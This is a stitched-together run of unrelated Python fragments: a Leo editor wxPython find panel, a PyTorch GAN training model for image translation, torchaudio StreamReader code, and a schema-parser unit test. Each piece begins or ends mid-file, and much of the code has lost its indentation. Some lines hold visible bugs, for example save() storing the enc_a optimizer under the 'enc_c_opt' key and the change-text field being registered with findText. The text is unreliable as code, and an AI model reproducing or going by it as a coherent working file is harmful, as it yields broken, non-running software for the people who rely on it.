    #@+node:ekr.20090126093408.22: *5* set_ivars
    def set_ivars (self,c):
        """Init the commander ivars from the find panel."""
        # N.B.: separate c.ivars are much more convenient than a dict.
        for key in self.intKeys:
            key = key + "_flag"
            data = self.dict.get(key)
            if data:
                box,id = data
                val = box.GetValue()
                #g.trace(key,val)
                setattr(c,key,val)
            else:
                # No widget registered for this flag: default it to False.
                #g.trace("no data",key)
                setattr(c,key,False)
        fp = self.findPanel
        c.find_text = fp.findText.GetValue()
        c.change_text = fp.changeText.GetValue()
    #@+node:ekr.20090126093408.23: *5* init_s_ctrl
    def init_s_ctrl (self,s):
        """Prepare the dummy search widget with the text s and return it.

        NOTE(review): wxSearchWidget defines no SetInsertionPoint/
        SetInsertionPointEnd methods in this file -- confirm they exist.
        """
        c = self.c
        t = self.s_text # the dummy widget
        # Set the text for searching.
        t.text = s
        # Set the insertion point.
        if c.reverse_flag:
            t.SetInsertionPointEnd()
        else:
            t.SetInsertionPoint(0)
        return t
    #@+node:ekr.20090126093408.25: *5* init
    def init (self,c):
        """Init the find panel from c.
        (The opposite of set_ivars)."""
        # N.B.: separate c.ivars are much more convenient than a dict.
        for key in self.intKeys:
            key = key + "_flag"
            val = getattr(c,key)
            data = self.dict.get(key)
            if data:
                box,id = data
                box.SetValue(val)
            # g.trace(key,repr(val))
        self.findPanel.findText.SetValue(c.find_text)
        self.findPanel.changeText.SetValue(c.change_text)
    #@-others
#@+node:ekr.20090126093408.26: *4* wxFindPanel class
class wxFindPanel (wx.Panel):
#@+others
#@+node:ekr.20090126093408.27: *5* FindPanel.__init__
def __init__(self,frame):
g.trace('wxFindPanel not ready yet')
return
# Init the base class.
wx.Panel.__init__(self,frame,-1)
self.frame = frame
topSizer = wx.BoxSizer(wx.VERTICAL)
topSizer.Add(0,10)
#@+<< Create the find text box >>
#@+node:ekr.20090126093408.28: *6* << Create the find text box >>
findSizer = wx.BoxSizer(wx.HORIZONTAL)
findSizer.Add(5,5)# Extra space.
# Label.
findSizer.Add(
wx.StaticText(self,-1,"Find:",
wx.Point(-1,10), wx.Size(50,25),0,""),
0, wx.BORDER | wx.TOP,15) # Vertical offset.
findSizer.Add(10,0) # Width.
# Text.
self.findText = plainTextWidget (self.c,self,-1,"",
wx.DefaultPosition, wx.Size(500,60),
wx.TE_PROCESS_TAB | wx.TE_MULTILINE,
wx.DefaultValidator,"")
findSizer.Add(self.findText.widget)
findSizer.Add(5,0)# Width.
topSizer.Add(findSizer)
topSizer.Add(0,10)
self.frame.dict["find_text"] = self.findText,id
#@-<< Create the find text box >>
#@+<< Create the change text box >>
#@+node:ekr.20090126093408.29: *6* << Create the change text box >>
changeSizer = wx.BoxSizer(wx.HORIZONTAL)
changeSizer.Add(5,5)# Extra space.
# Label.
changeSizer.Add(
wx.StaticText(self,-1,"Change:",
wx.Point(-1,10),wx.Size(50,25),0,""),
0, wx.BORDER | wx.TOP,15)# Vertical offset.
changeSizer.Add(10,0) # Width.
# Text.
self.changeText = plainTextWidget (self.c,self,-1,"",
wx.DefaultPosition, wx.Size(500,60),
wx.TE_PROCESS_TAB | wx.TE_MULTILINE,
wx.DefaultValidator,"")
changeSizer.Add(self.changeText.widget)
changeSizer.Add(5,0)# Width.
topSizer.Add(changeSizer)
topSizer.Add(0,10)
self.frame.dict["change_text"] = self.findText,id
#@-<< Create the change text box >>
#@+<< Create all the find check boxes >>
#@+node:ekr.20090126093408.30: *6* << Create all the find check boxes >>
col1Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the first column of widgets >>
#@+node:ekr.20090126093408.31: *7* << Create the first column of widgets >>
# The var names must match the names in leoFind class.
table = (
("plain-search-flag","Plain Search",wx.RB_GROUP),
("pattern_match_flag","Pattern Match",0),
("script_search_flag","Script Search",0))
for var,label,style in table:
id = wx.NewId()
box = wx.RadioButton(self,id,label,
wx.DefaultPosition,(100,25),
style,wx.DefaultValidator,"group1")
if style == wx.RB_GROUP:
box.SetValue(True) # The default entry.
col1Sizer.Add(box,0,wx.BORDER | wx.LEFT,60)
self.frame.dict[var] = box,id
table = (("script_change_flag","Script Change"),)
for var,label in table:
id = wx.NewId()
box = wx.CheckBox(self,id,label,
wx.DefaultPosition,(100,25),
0,wx.DefaultValidator,"")
col1Sizer.Add(box,0,wx.BORDER | wx.LEFT,60)
self.frame.dict[var] = box,id
#@-<< Create the first column of widgets >>
col2Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the second column of widgets >>
#@+node:ekr.20090126093408.32: *7* << Create the second column of widgets >>
# The var names must match the names in leoFind class.
table = (
("whole_word_flag","Whole Word"),
("ignore_case_flag","Ignore Case"),
("wrap_flag","Wrap Around"),
("reverse_flag","Reverse"))
for var,label in table:
id = wx.NewId()
box = wx.CheckBox(self,id,label,
wx.DefaultPosition,(100,25),
0,wx.DefaultValidator,"")
col2Sizer.Add(box,0,wx.BORDER | wx.LEFT,20)
self.frame.dict[var] = box,id
#@-<< Create the second column of widgets >>
col3Sizer = wx.BoxSizer(wx.VERTICAL)
#@+<< Create the third column of widgets | |
"""
Update encoders (e_c, e_a) and generator weights - accumulate losses, backward
:param opts:
:return:
"""
# update G, Ec, Ea - update with real images
self.opts = opts
self.enc_c_opt.zero_grad()
self.enc_a_opt.zero_grad()
self.gen_opt.zero_grad()
self.backward_EG()
# update G - generator loss on fake generated images
self.backward_G_alone()
self.enc_c_opt.step()
self.enc_a_opt.step()
self.gen_opt.step()
    def backward_EG(self):
        """
        Accumulate all losses on real images for encoders (e_a, e_c) and generator, backward.

        Terms: L1/L2 self- and cross-cycle reconstruction, content-adversarial,
        GAN + classification on dis1, KL on both latents, attribute-space
        classification/regression, and an optional attribution-map penalty.
        Backward keeps the graph alive for backward_G_alone.
        :return:
        """
        # self recon
        loss_G = torch.mean(
            torch.abs(self.input - torch.cat((self.fake_AA_encoded, self.fake_BB_encoded), 0))) * self.opts.lambda_rec
        self.l1_self_rec_loss = loss_G.item()
        # l2 recon + cyclic (each term only when its lambda enables it)
        if self.opts.lambda_l2_rec > 0:
            l2_self_rec_loss = self.l2_loss(self.input, torch.cat((self.fake_AA_encoded, self.fake_BB_encoded), 0)) * self.opts.lambda_l2_rec
            self.l2_self_rec_loss = l2_self_rec_loss.item()
            loss_G += l2_self_rec_loss
        if self.opts.lambda_l2_rec_cc > 0:
            l2_cc_rec_loss = self.l2_loss(self.input, torch.cat((self.fake_A_recon, self.fake_B_recon), 0)) * self.opts.lambda_l2_rec_cc
            self.l2_cc_rec_loss = l2_cc_rec_loss.item()
            loss_G += l2_cc_rec_loss
        # content loss
        loss_E_content = self.backward_E_content(self.z_content)
        loss_G += loss_E_content
        self.E_content_loss = loss_E_content.item()
        # discriminator loss (one BCE-vs-ones term per dis1 output scale)
        pred_fake, pred_fake_cls = self.dis1.forward(self.fake_encoded_img)
        loss_G_GAN = 0
        for out_a in pred_fake:
            outputs_fake = torch.sigmoid(out_a)
            all_ones = torch.ones_like(outputs_fake).to(self.device)
            loss_G_GAN += nn.functional.binary_cross_entropy(outputs_fake, all_ones)
        loss_G_gan = loss_G_GAN * self.opts.lambda_G_gan
        self.G_gan_loss = loss_G_gan.item()
        loss_G += loss_G_gan
        # classification
        loss_G_cls = self.cls_loss(pred_fake_cls, self.c_org) * self.opts.lambda_cls_G
        self.G_gan_cls_loss = loss_G_cls.item()
        loss_G += loss_G_cls
        #cross-cycle recon
        loss_G_L1_cc = torch.mean(
            torch.abs(self.input - torch.cat((self.fake_A_recon, self.fake_B_recon), 0))) * self.opts.lambda_rec_cc
        loss_G += loss_G_L1_cc
        self.l1_cc_rec_loss = loss_G_L1_cc.item()
        # KL loss - z_c
        loss_kl_zc = self._l2_regularize(self.z_content) * self.opts.lambda_kl_zc
        # KL loss - z_a (closed-form KL of N(mu, exp(logvar)) against N(0, 1))
        kl_element = self.mu.pow(2).add_(self.logvar.exp()).mul_(-1).add_(1).add_(self.logvar)
        loss_kl_za = torch.sum(kl_element).mul_(-0.5) * self.opts.lambda_kl_za
        self.kl_loss_zc = loss_kl_zc.item()
        self.kl_loss_za = loss_kl_za.item()
        loss_G += loss_kl_zc + loss_kl_za
        # classification loss on the attribute latent space
        loss_E_cls_self = self.cls_loss(self.E_pred_cls, self.c_org) * self.opts.lambda_cls_E
        self.E_cls_self_loss = loss_E_cls_self.item()
        # regression loss on E_a (shares lambda_cls_E with the cls term)
        if self.opts.regression:
            loss_E_reg_self = self.reg_loss(self.E_pred_reg, self.c_reg) * self.opts.lambda_cls_E
            self.E_reg_self_loss = loss_E_reg_self.item()
            loss_E_cls_self += loss_E_reg_self
        self.E_cls_loss = loss_E_cls_self.item()
        loss_G += loss_E_cls_self
        # feature attribution map loss (L1 sparsity on the difference maps)
        if self.opts.loss_diff_M:
            diff_M_reg_loss = torch.abs(torch.cat((self.diff_fake_A_encoded,
                self.diff_fake_B_encoded),0)).mean() * self.opts.lambda_diff_M_reg
            self.diff_M_loss = diff_M_reg_loss.item()
            loss_G += diff_M_reg_loss
        # retain graph for backward_G_alone
        loss_G.backward(retain_graph=True)
        self.G_loss = loss_G.item()
def backward_E_content(self, z_content):
"""
Content encoder (E_c) losses using the content discriminator
:param z_content: content latent vector
:return:
"""
# Update encoder to fool discriminator
pred_cls = self.disContent.forward(z_content, mode='cls')
if not (self.opts.D_content_dis_cls_all1 == 0):
# the goal is to learn all classes == 0.5
all1 = self.opts.D_content_dis_cls_all1 * torch.ones_like(self.c_org).to(self.device)
loss_E_content = self.cls_loss(pred_cls, all1) * self.opts.lambda_E_content_cls
else:
# the goal is to fool discriminator- i.e. reverse the classes
loss_E_content = self.cls_loss(pred_cls, 1 - self.c_org) * self.opts.lambda_E_content_cls
return loss_E_content
def backward_G_alone(self):
"""
Accumulate all losses on fake images for generator, backward
:return:
"""
pred_fake, pred_fake_cls = self.dis2.forward(self.fake_random_img)
loss_G_GAN2 = 0
for out_a in pred_fake:
outputs_fake = torch.sigmoid(out_a)
all_ones = torch.ones_like(outputs_fake).to(self.device)
loss_G_GAN2 += nn.functional.binary_cross_entropy(outputs_fake, all_ones)
# classification
loss_G_cls2 = self.cls_loss(pred_fake_cls, self.c_org) * self.opts.lambda_cls_G
self.G_gan2_cls_loss = loss_G_cls2.item()
loss_G_GAN2 = self.opts.lambda_G_gan * loss_G_GAN2
loss_G = loss_G_GAN2 + loss_G_cls2
self.G_gan2_loss = loss_G_GAN2.item()
self.G_gan2_cls_loss = loss_G_cls2.item()
# latent regression loss
if self.opts.loss_latent_l1_random:
loss_z_L1_a = torch.mean(torch.abs(self.mu2_a - self.z_random_a)) * self.opts.lambda_latent_l1
loss_z_L1_b = torch.mean(torch.abs(self.mu2_b - self.z_random_b)) * self.opts.lambda_latent_l1
self.l1_recon_random_z_loss = loss_z_L1_a.item() + loss_z_L1_b.item()
loss_z_L1 = loss_z_L1_a + loss_z_L1_b
loss = loss_G + loss_z_L1
loss.backward()
else:
loss_G.backward()
def _l2_regularize(self, mu):
"""
l2 regularization on weights
:param mu:
:return:
"""
mu_2 = torch.pow(mu, 2)
encoding_loss = torch.mean(mu_2)
return encoding_loss
def assemble_outputs(self):
"""
Assesmble images to be saved for 2D data
:return:
"""
images_a = (self.real_A).detach()
images_b = (self.real_B).detach()
images_a1 = (self.fake_B_encoded).detach()
images_a2 = (self.fake_B_random).detach()
images_a3 = (self.diff_fake_B_encoded).detach()
images_a4 = (self.fake_AA_encoded).detach()
images_a5 = (self.fake_A_recon).detach()
images_b1 = (self.fake_A_encoded).detach()
images_b2 = (self.fake_A_random).detach()
images_b3 = (self.diff_fake_A_encoded).detach()
images_b4 = (self.fake_BB_encoded).detach()
images_b5 = (self.fake_B_recon).detach()
if not self.mask is None:
mask_a = (self.mask_a.unsqueeze(0)).detach()
mask_b = (self.mask_b.unsqueeze(0)).detach()
row1 = torch.cat(
(images_a[0:1, ::], mask_a[0:1, ::], images_a1[0:1, ::], images_a2[0:1, ::], images_a3[0:1, ::], images_a4[0:1, ::], images_a5[0:1, ::]), 3)
row2 = torch.cat(
(images_b[0:1, ::], mask_b[0:1, ::], images_b1[0:1, ::], images_b2[0:1, ::], images_b3[0:1, ::], images_b4[0:1, ::], images_b5[0:1, ::]), 3)
else:
row1 = torch.cat(
(images_a[0:1, ::], images_a1[0:1, ::], images_a2[0:1, ::], images_a3[0:1, ::], images_a4[0:1, ::], images_a5[0:1, ::]), 3)
row2 = torch.cat(
(images_b[0:1, ::], images_b1[0:1, ::], images_b2[0:1, ::], images_b3[0:1, ::], images_b4[0:1, ::], images_b5[0:1, ::]), 3)
attr_row = None
images_a_content = torch.mean(self.z_content_a, dim=1, keepdim=True)
images_b_content = torch.mean(self.z_content_b, dim=1, keepdim=True)
content_row = torch.cat((images_a_content[0:1, ::], images_b_content[0:1, ::]), 3)
return torch.cat((row1, row2), 2), content_row, attr_row
    def assemble_outputs_3d(self):
        """
        Assemble images to be saved for 3D data.

        Extracts the first item/channel of every intermediate as a numpy array.
        Attribute codes are reshaped to a fixed grid only for nz in {640, 64};
        otherwise the attr images are None.
        :return: tuple of numpy arrays (inputs, recons, diffs, content/attr
            visualizations, masks); mask entries are None when no mask is set
        """
        images_a = self._normalize_image(self.real_A).detach().cpu().numpy()[0, 0, ::]
        images_b = self._normalize_image(self.real_B).detach().cpu().numpy()[0, 0, ::]
        images_a1 = self._normalize_image(self.fake_AA_encoded).detach().cpu().numpy()[0, 0, ::]
        images_b1 = self._normalize_image(self.fake_BB_encoded).detach().cpu().numpy()[0, 0, ::]
        images_a_clc = self._normalize_image(self.fake_A_recon).detach().cpu().numpy()[0, 0, ::]
        images_b_clc = self._normalize_image(self.fake_B_recon).detach().cpu().numpy()[0, 0, ::]
        images_a_random = self._normalize_image(self.fake_B_random).detach().cpu().numpy()[0, 0, ::]
        images_b_random = self._normalize_image(self.fake_A_random).detach().cpu().numpy()[0, 0, ::]
        if not self.mask is None:
            mask_a = self._normalize_image(self.mask_a).detach().cpu().numpy()[0, 0, ::]
            mask_b = self._normalize_image(self.mask_b).detach().cpu().numpy()[0, 0, ::]
        else:
            mask_a = None
            mask_b = None
        # Hard-coded attr-code grids: 640 -> 8x10x8 volume, 64 -> 8x8 plane.
        if self.opts.nz == 640:
            images_a_attr = self.z_attr_a.view(self.z_attr_a.size(0), 1, 8, 10, 8)
            images_b_attr = self.z_attr_b.view(self.z_attr_b.size(0), 1, 8, 10, 8)
            images_a_attr = self._normalize_image(images_a_attr).detach().cpu().numpy()[0, 0, ::]
            images_b_attr = self._normalize_image(images_b_attr).detach().cpu().numpy()[0, 0, ::]
        elif self.opts.nz == 64:
            images_a_attr = self.z_attr_a.view(self.z_attr_a.size(0), 1, 8, 8)
            images_b_attr = self.z_attr_b.view(self.z_attr_b.size(0), 1, 8, 8)
            images_a_attr = self._normalize_image(images_a_attr).detach().cpu().numpy()[0, 0, ::]
            images_b_attr = self._normalize_image(images_b_attr).detach().cpu().numpy()[0, 0, ::]
        else:
            images_a_attr = None
            images_b_attr = None
        images_a_content = self._normalize_image(torch.mean(self.z_content_a, dim=1, keepdim=True)).detach().cpu().numpy()[0, 0, ::]
        images_b_content = self._normalize_image(torch.mean(self.z_content_b, dim=1, keepdim=True)).detach().cpu().numpy()[0, 0, ::]
        images_a2 = self._normalize_image(self.fake_B_encoded).detach().cpu().numpy()[0, 0, ::]
        images_a3 = self._normalize_image(self.diff_fake_B_encoded).detach().cpu().numpy()[0, 0, ::]
        images_b2 = self._normalize_image(self.fake_A_encoded).detach().cpu().numpy()[0, 0, ::]
        images_b3 = self._normalize_image(self.diff_fake_A_encoded).detach().cpu().numpy()[0, 0, ::]
        return images_a, images_b, images_a1, images_a2, images_a3, images_b1, images_b2, images_b3, images_a_content, \
               images_b_content, images_a_attr, images_b_attr,\
               images_a_clc, images_b_clc, images_a_random, images_b_random, mask_a, mask_b
def _normalize_image(self, x):
return x[:, 0:3, :, :]
def save(self, filename, ep, total_it, it):
"""
Save networks
:param filename: save path
:param ep: current epoch
:param total_it: total iterations
:param it: current iteration in epoch
:return:
"""
state = {}
state['ep'] = ep
state['total_it'] = total_it
state['it'] = it
state['enc_c'] = self.enc_c.state_dict()
state['enc_a'] = self.enc_a.state_dict()
state['enc_c_opt'] = self.enc_c_opt.state_dict()
state['enc_c_opt'] = self.enc_a_opt.state_dict()
state['disContent'] = self.disContent.state_dict()
state['disContent_opt'] = self.disContent_opt.state_dict()
state['gen'] = self.gen.state_dict()
state['gen_opt'] = self.gen_opt.state_dict()
state['dis1'] = self.dis1.state_dict()
state['dis2'] = self.dis2.state_dict()
state['dis1_opt'] = self.dis1_opt.state_dict()
state['dis2_opt'] = self.dis2_opt.state_dict()
torch.save(state, filename)
return
def resume(self, model_dir, device_0, device_1, train=True):
"""
Load network states
:param model_dir: load path
:param device_0: original gpu device
:param device_1: gpu device to use
:param train: whether to train or test
:return: current epoch, total iterations, current iteration
"""
checkpoint = torch.load(model_dir, map_location={device_0: device_1})
if train:
self.dis1.load_state_dict(checkpoint['dis1'], strict=False)
self.dis2.load_state_dict(checkpoint['dis2'], strict=False)
self.disContent.load_state_dict(checkpoint['disContent'], strict=False)
self.enc_c.load_state_dict(checkpoint['enc_c'], strict=False)
self.enc_a.load_state_dict(checkpoint['enc_a'], strict=False)
self.gen.load_state_dict(checkpoint['gen'], strict=False)
try:
it = checkpoint['it']
except:
it = 0
return checkpoint['ep'], checkpoint['total_it'], it
def test_forward_random_group(self, image, c_org=None, num=50):
"""
Method for translation from one image of one class to another class.
Using rejection sampling - this will give the mean and variance maps.
:param image: image input
:param c_org: label of image
:param num: number of times to sample from attribute latent space (for mean and variance maps)
:return:
"""
z_content = self.enc_c.forward(image)
if len(image.size()) == 5:
output = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
diff_m_pos = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
diff_m_neg = torch.zeros((num, image.size(1), image.size(2), image.size(3), image.size(4)))
else:
output = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
diff_m_pos = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
diff_m_neg = torch.zeros((num, image.size(1), image.size(2), image.size(3)))
output = output.to(self.device)
diff_m_pos = diff_m_pos.to(self.device)
diff_m_neg = diff_m_neg.to(self.device)
z_random = torch.zeros((num, self.nz)).to(self.device)
flag = True
i = 0
k = 0
if c_org[0, 0] == 1:
class_num = 1
elif c_org[0, 1] == 1:
class_num = 0
while flag:
k = k + 1
z_random_temp = self._get_z_random(1, self.nz, 'gauss')
_, _, pred_random, _ = self.enc_a.forward(x=None, z=z_random_temp.detach())
prob, pred_ind = torch.max(pred_random, 1)
if (pred_ind == class_num) and (i < num) and (prob > 0.9):
z_random[i] = z_random_temp
i = i + 1
if i == num - 1:
flag = False
elif k > int(300 * 2 * 50):
z_random = self._get_z_random(num, self.nz, 'gauss')
print('Random z not separable')
flag = False
c_inv = 1 - c_org
for z in range(num):
z_temp = z_random[z].unsqueeze(0)
output[z] = self.gen.forward(x=z_content, z=z_temp, c=c_inv)
diff_m = (output[z].unsqueeze(0) - image)
diff_m_pos[z] = diff_m
diff_m_neg[z] = -diff_m
output = torch.mean(output, dim=0, keepdim=True)
diff_m_pos_mean = torch.mean(diff_m_pos, dim=0, keepdim=True)
diff_m_neg_mean = torch.mean(diff_m_neg, dim=0, keepdim=True)
diff_m_pos_std = torch.std(diff_m_pos, dim=0, keepdim=True)
diff_m_neg_std = -diff_m_pos_std
return output, diff_m_pos_mean, diff_m_neg_mean, diff_m_pos_std, diff_m_neg_std
def | |
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional, Tuple, Dict, Iterator
import torch
import torchaudio
@dataclass
class StreamReaderSourceStream:
    """StreamReaderSourceStream()
    The metadata of a source stream. This class is used when representing streams of
    media type other than `audio` or `video`.
    When source stream is `audio` or `video` type, :py:class:`SourceAudioStream` and
    :py:class:`SourceVideoStream`, which report additional media-specific attributes,
    are used respectively.
    """
    media_type: str
    """The type of the stream.
    One of `audio`, `video`, `data`, `subtitle`, `attachment` and empty string.
    .. note::
        Only `audio` and `video` streams are supported for output.
    .. note::
        Still images, such as PNG and JPEG formats are reported as `video`.
    """
    codec: str
    """Short name of the codec. Such as `pcm_s16le` and `h264`."""
    codec_long_name: str
    """Detailed name of the codec.
    Such as `"PCM signed 16-bit little-endian"` and `"H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10"`.
    """
    format: Optional[str]
    """Media format. Such as `s16` and `yuv420p`.
    Commonly found audio values are;
    - `u8`, `u8p`: Unsigned 8-bit unsigned integer.
    - `s16`, `s16p`: 16-bit signed integer.
    - `s32`, `s32p`: 32-bit signed integer.
    - `flt`, `fltp`: 32-bit floating-point.
    .. note::
        `p` at the end indicates the format is `planar`.
        Channels are grouped together instead of interspersed in memory.
    """
    bit_rate: Optional[int]
    """Bit rate of the stream in bits-per-second.
    This is an estimated value based on the initial few frames of the stream.
    For container formats and variable bit rate, it can be 0.
    """
@dataclass
class StreamReaderSourceAudioStream(StreamReaderSourceStream):
    """StreamReaderSourceAudioStream()
    The metadata of an audio source stream.
    In addition to the attributes reported by :py:func:`SourceStream`,
    when the source stream is audio type, the following additional attributes
    are reported.
    """
    sample_rate: float
    """Sample rate of the audio."""
    num_channels: int
    """Number of channels."""
@dataclass
class StreamReaderSourceVideoStream(StreamReaderSourceStream):
    """StreamReaderSourceVideoStream()
    The metadata of a video source stream.
    In addition to the attributes reported by :py:func:`SourceStream`,
    when the source stream is video type, the following additional attributes
    are reported.
    """
    width: int
    """Width of the video frame in pixel."""
    height: int
    """Height of the video frame in pixel."""
    frame_rate: float
    """Frame rate."""
# Indices of SrcInfo returned by low-level `get_src_stream_info`
# (these must stay in sync with the tuple layout produced by the
# native torchaudio/ffmpeg binding).
# - COMMON
_MEDIA_TYPE = 0
_CODEC = 1
_CODEC_LONG = 2
_FORMAT = 3
_BIT_RATE = 4
# - AUDIO
_SAMPLE_RATE = 5
_NUM_CHANNELS = 6
# - VIDEO
_WIDTH = 7
_HEIGHT = 8
_FRAME_RATE = 9
def _parse_si(i):
    """Convert a raw source-stream info tuple into the matching dataclass.

    Audio and video streams get their media-specific subclasses; any other
    media type falls back to the generic StreamReaderSourceStream with no
    format / bit-rate information.
    """
    media_type = i[_MEDIA_TYPE]
    codec_name = i[_CODEC]
    codec_long_name = i[_CODEC_LONG]
    if media_type == "audio":
        return StreamReaderSourceAudioStream(
            media_type,
            codec_name,
            codec_long_name,
            i[_FORMAT],
            i[_BIT_RATE],
            i[_SAMPLE_RATE],
            i[_NUM_CHANNELS],
        )
    if media_type == "video":
        return StreamReaderSourceVideoStream(
            media_type,
            codec_name,
            codec_long_name,
            i[_FORMAT],
            i[_BIT_RATE],
            i[_WIDTH],
            i[_HEIGHT],
            i[_FRAME_RATE],
        )
    return StreamReaderSourceStream(media_type, codec_name, codec_long_name, None, None)
@dataclass
class StreamReaderOutputStream:
    """OutputStream()
    Output stream configured on :py:class:`StreamReader`.
    """
    source_index: int
    """Index of the source stream that this output stream is connected to."""
    filter_description: str
    """Description of filter graph applied to the source stream."""
def _parse_oi(i):
    """Convert a raw output-stream info pair into StreamReaderOutputStream."""
    source_index, filter_description = i[0], i[1]
    return StreamReaderOutputStream(source_index, filter_description)
class StreamReader:
"""Fetch and decode audio/video streams chunk by chunk.
For the detailed usage of this class, please refer to the tutorial.
Args:
src (str): Source. Can be a file path, URL, device identifier or filter expression.
format (str or None, optional):
Override the input format, or specify the source sound device.
Default: ``None`` (no override nor device input).
This argument serves two different usecases.
1) Override the source format.
This is useful when the input data do not contain a header.
2) Specify the input source device.
This allows to load media stream from hardware devices,
such as microphone, camera and screen, or a virtual device.
.. note::
This option roughly corresponds to ``-f`` option of ``ffmpeg`` command.
Please refer to the ffmpeg documentations for the possible values.
https://ffmpeg.org/ffmpeg-formats.html
For device access, the available values vary based on hardware (AV device) and
software configuration (ffmpeg build).
https://ffmpeg.org/ffmpeg-devices.html
option (dict of str to str, optional):
Custom option passed when initializing format context (opening source).
You can use this argument to change the input source before it is passed to decoder.
Default: ``None``.
"""
def __init__(
self,
src: str,
format: Optional[str] = None,
option: Optional[Dict[str, str]] = None,
):
self._s = torch.ops.torchaudio.ffmpeg_streamer_init(src, format, option)
i = torch.ops.torchaudio.ffmpeg_streamer_find_best_audio_stream(self._s)
self._i_audio = None if i < 0 else i
i = torch.ops.torchaudio.ffmpeg_streamer_find_best_video_stream(self._s)
self._i_video = None if i < 0 else i
    @property
    def num_src_streams(self):
        """Number of streams found in the provided media source.
        :type: int
        """
        # Delegates to the ffmpeg-based native streamer.
        return torch.ops.torchaudio.ffmpeg_streamer_num_src_streams(self._s)
    @property
    def num_out_streams(self):
        """Number of output streams configured by client code.
        :type: int
        """
        # Delegates to the ffmpeg-based native streamer.
        return torch.ops.torchaudio.ffmpeg_streamer_num_out_streams(self._s)
    @property
    def default_audio_stream(self):
        """The index of default audio stream. ``None`` if there is no audio stream
        :type: Optional[int]
        """
        # Resolved once in __init__ from the native "find best stream" query.
        return self._i_audio
    @property
    def default_video_stream(self):
        """The index of default video stream. ``None`` if there is no video stream
        :type: Optional[int]
        """
        # Resolved once in __init__ from the native "find best stream" query.
        return self._i_video
    def get_src_stream_info(self, i: int) -> torchaudio.io.StreamReaderSourceStream:
        """Get the metadata of source stream
        Args:
            i (int): Stream index.
        Returns:
            SourceStream
        """
        # The native call returns a plain tuple; _parse_si picks the dataclass.
        return _parse_si(torch.ops.torchaudio.ffmpeg_streamer_get_src_stream_info(self._s, i))
    def get_out_stream_info(self, i: int) -> torchaudio.io.StreamReaderOutputStream:
        """Get the metadata of output stream
        Args:
            i (int): Stream index.
        Returns:
            OutputStream
        """
        # The native call returns a (source_index, filter_desc) pair.
        return _parse_oi(torch.ops.torchaudio.ffmpeg_streamer_get_out_stream_info(self._s, i))
    def seek(self, timestamp: float):
        """Seek the stream to the given timestamp [second]
        Args:
            timestamp (float): Target time in second.
        """
        torch.ops.torchaudio.ffmpeg_streamer_seek(self._s, timestamp)
def add_basic_audio_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
sample_rate: Optional[int] = None,
dtype: torch.dtype = torch.float32,
):
"""Add output audio stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source audio stream index.
If omitted, :py:attr:`default_audio_stream` is used.
sample_rate (int or None, optional): If provided, resample the audio.
dtype (torch.dtype, optional): If not ``None``, change the output sample precision.
If floating point, then the sample value range is
`[-1, 1]`.
"""
i = self.default_audio_stream if stream_index is None else stream_index
torch.ops.torchaudio.ffmpeg_streamer_add_basic_audio_stream(
self._s, i, frames_per_chunk, buffer_chunk_size, sample_rate, dtype
)
def add_basic_video_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
frame_rate: Optional[int] = None,
width: Optional[int] = None,
height: Optional[int] = None,
format: str = "RGB",
):
"""Add output video stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source video stream index.
If omitted, :py:attr:`default_video_stream` is used.
frame_rate (int or None, optional): If provided, change the frame rate.
width (int or None, optional): If provided, change the image width. Unit: Pixel.
height (int or None, optional): If provided, change the image height. Unit: Pixel.
format (str, optional): Change the format of image channels. Valid values are,
- `RGB`: 8 bits * 3 channels
- `BGR`: 8 bits * 3 channels
- `YUV`: 8 bits * 3 channels
- `GRAY`: 8 bits * 1 channels
"""
i = self.default_video_stream if stream_index is None else stream_index
torch.ops.torchaudio.ffmpeg_streamer_add_basic_video_stream(
self._s,
i,
frames_per_chunk,
buffer_chunk_size,
frame_rate,
width,
height,
format,
)
def add_audio_stream(
self,
frames_per_chunk: int,
buffer_chunk_size: int = 3,
stream_index: Optional[int] = None,
filter_desc: Optional[str] = None,
decoder: Optional[str] = None,
decoder_options: Optional[Dict[str, str]] = None,
):
"""Add output audio stream
Args:
frames_per_chunk (int): Number of frames returned by StreamReader as a chunk.
If the source stream is exhausted before enough frames are buffered,
then the chunk is returned as-is.
buffer_chunk_size (int, optional): Internal buffer size.
When this many chunks are created, but
client code does not pop the chunk, if a new frame comes in, the old
chunk is dropped.
stream_index (int or None, optional): The source audio stream index.
If omitted, :py:attr:`default_audio_stream` is used.
filter_desc (str or None, | |
member 'a'",
":11: error: Redefinition of 'MyAction2_path' member 'b'",
":13: error: Redefinition of 'MyAction2_query' member 'a'",
":15: error: Redefinition of 'MyAction2_input' member 'b'"
]
self.assertListEqual(cm_exc.exception.errors, expected_errors)
self.assertListEqual(parser.errors, expected_errors)
    def test_action_path_base_types(self):
        """An action 'path' section may list struct base types; the generated '<action>_path' struct inherits them."""
        parser = SchemaMarkdownParser()
        parser.parse_string('''\
struct Foo
    int a
    optional string b

struct Bonk
    float(nullable) c

typedef Bonk Bar

action FooAction
    path (Foo)
        bool c

action BarAction
    path (Foo, Bar)
        datetime d
''')
        # The synthesized *_path structs carry the base-type list verbatim.
        self.assertDictEqual(parser.types, {
            'Bar': {
                'typedef': {
                    'name': 'Bar',
                    'type': {'user': 'Bonk'}
                }
            },
            'BarAction': {
                'action': {
                    'name': 'BarAction',
                    'path': 'BarAction_path'
                }
            },
            'BarAction_path': {
                'struct': {
                    'name': 'BarAction_path',
                    'bases': ['Foo', 'Bar'],
                    'members': [
